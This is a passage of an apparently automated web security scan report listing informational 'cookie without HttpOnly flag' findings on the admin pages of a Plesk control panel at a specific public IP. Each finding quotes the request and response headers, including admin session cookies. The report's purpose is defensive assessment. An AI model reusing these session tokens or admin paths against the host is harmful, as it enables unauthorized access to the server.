sessionID=onthshevccsqtbfldgbmakbv

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 13:50:58 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=subscriptions; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 13:50:58 GMT
Connection: close
Content-Length: 9782

<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><ht
...[SNIP]...

5.41. https://50.22.21.242:8443/admin/promotion/mobile-monitor/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/promotion/mobile-monitor/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/promotion/mobile-monitor/ HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://50.22.21.242:8443/smb/admin-home
Cookie: PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; locale=en-US; sessionID=ouhymmzgtdaqakoglnanbrbl

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 01:54:35 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 01:54:35 GMT
Content-Length: 16273

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...

5.42. https://50.22.21.242:8443/admin/reseller/create  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/reseller/create

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/reseller/create HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://50.22.21.242:8443/admin/reseller/list?context=resellers
Cookie: PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; locale=en-US; sessionID=ouhymmzgtdaqakoglnanbrbl; psaContext=resellers

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 23:37:13 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=resellers; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 23:37:13 GMT
Content-Length: 38151

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

5.43. https://50.22.21.242:8443/admin/reseller/list  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/reseller/list

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/reseller/list?context=resellers HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://50.22.21.242:8443/left.php3
Cookie: PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; locale=en-US; sessionID=ouhymmzgtdaqakoglnanbrbl; psaContext=resellers

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 23:37:04 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=resellers; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 23:37:04 GMT
Content-Length: 14509

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

5.44. https://50.22.21.242:8443/admin/reseller/list/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/reseller/list/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/reseller/list/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; filelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; sessionslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; admin_report__report_id=2; sessionID=ouhymmzgtdaqakoglnanbrbl; form-nal-aps-catalog-search-show=false; rulelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6OTk5OTk5fQ%3D%3D; PLESKSESSID=b7d5dd4b3a9bb447376c29193bcc7fd3; psaContext=home

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 06:49:24 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=resellers; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 06:49:24 GMT
Connection: close
Content-Length: 14513

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

5.45. https://50.22.21.242:8443/admin/reseller/list/reset-search/true/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/reseller/list/reset-search/true/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/reseller/list/reset-search/true/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/admin/home/admin
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; filelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; sessionslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; admin_report__report_id=2; sessionID=ouhymmzgtdaqakoglnanbrbl; form-nal-aps-catalog-search-show=false; rulelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6OTk5OTk5fQ%3D%3D; PLESKSESSID=b7d5dd4b3a9bb447376c29193bcc7fd3; psaContext=home

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 06:49:25 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=resellers; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 06:49:25 GMT
Connection: close
Content-Length: 14849

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

5.46. https://50.22.21.242:8443/admin/reseller/login-info/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/reseller/login-info/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/reseller/login-info/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; filelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; sessionslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; admin_report__report_id=2; form-nal-aps-catalog-search-show=false; rulelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6OTk5OTk5fQ%3D%3D; sessionID=zbwabgmusbzyeqroeknpnlxw; SSOSID=eJyrViouzo9PSU1LLM0pUbJSKqsssSg3rTCzzCotKUktKc4psMxLrzQpLE%2FJSzTOKi4ryypRqgUAGGIUIQ%3D%3D; PLESKSESSID=d1d89b662c5412350defeb3cf7a23a17; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 01:02:48 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 07:00:09 GMT
Connection: close
Content-Length: 10010

<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><ht
...[SNIP]...

5.47. https://50.22.21.242:8443/admin/reseller/personal-info/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/reseller/personal-info/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/reseller/personal-info/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; filelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; sessionslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; admin_report__report_id=2; form-nal-aps-catalog-search-show=false; rulelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6OTk5OTk5fQ%3D%3D; sessionID=zbwabgmusbzyeqroeknpnlxw; SSOSID=eJyrViouzo9PSU1LLM0pUbJSKqsssSg3rTCzzCotKUktKc4psMxLrzQpLE%2FJSzTOKi4ryypRqgUAGGIUIQ%3D%3D; PLESKSESSID=d1d89b662c5412350defeb3cf7a23a17; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 01:02:48 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 07:00:09 GMT
Connection: close
Content-Length: 10013

<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><ht
...[SNIP]...

5.48. https://50.22.21.242:8443/admin/reseller/tools/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/reseller/tools/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/reseller/tools/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; filelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; sessionslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; admin_report__report_id=2; form-nal-aps-catalog-search-show=false; rulelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6OTk5OTk5fQ%3D%3D; sessionID=zbwabgmusbzyeqroeknpnlxw; SSOSID=eJyrViouzo9PSU1LLM0pUbJSKqsssSg3rTCzzCotKUktKc4psMxLrzQpLE%2FJSzTOKi4ryypRqgUAGGIUIQ%3D%3D; PLESKSESSID=d1d89b662c5412350defeb3cf7a23a17; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 01:02:47 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 07:00:09 GMT
Connection: close
Content-Length: 10005

<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><ht
...[SNIP]...

5.49. https://50.22.21.242:8443/admin/reseller/tools/id/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/reseller/tools/id/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/reseller/tools/id/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; filelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; sessionslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; admin_report__report_id=2; form-nal-aps-catalog-search-show=false; rulelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6OTk5OTk5fQ%3D%3D; sessionID=zbwabgmusbzyeqroeknpnlxw; SSOSID=eJyrViouzo9PSU1LLM0pUbJSKqsssSg3rTCzzCotKUktKc4psMxLrzQpLE%2FJSzTOKi4ryypRqgUAGGIUIQ%3D%3D; PLESKSESSID=d1d89b662c5412350defeb3cf7a23a17; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 01:02:47 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 07:00:09 GMT
Connection: close
Content-Length: 10008

<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><ht
...[SNIP]...

5.50. https://50.22.21.242:8443/admin/reseller/tools/id/1/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/reseller/tools/id/1/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/reseller/tools/id/1/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; filelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; sessionslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; admin_report__report_id=2; form-nal-aps-catalog-search-show=false; rulelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6OTk5OTk5fQ%3D%3D; sessionID=zbwabgmusbzyeqroeknpnlxw; SSOSID=eJyrViouzo9PSU1LLM0pUbJSKqsssSg3rTCzzCotKUktKc4psMxLrzQpLE%2FJSzTOKi4ryypRqgUAGGIUIQ%3D%3D; PLESKSESSID=d1d89b662c5412350defeb3cf7a23a17; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 01:02:47 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 07:00:09 GMT
Connection: close
Content-Length: 10010

<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><ht
...[SNIP]...

5.51. https://50.22.21.242:8443/admin/server/admin-plan  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/server/admin-plan

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/server/admin-plan HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/smb/redirect/pleskin/root/?dst=%2Fadmin%2Fserver%2Fadmin-plan&src=%2Fsmb%2Fsettings%2F&srcController=SettingsController
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; psaContext=dashboard; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; PLESKSESSID=2b487a11e38efdea41e954b30502b2e0; locale=en-US

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
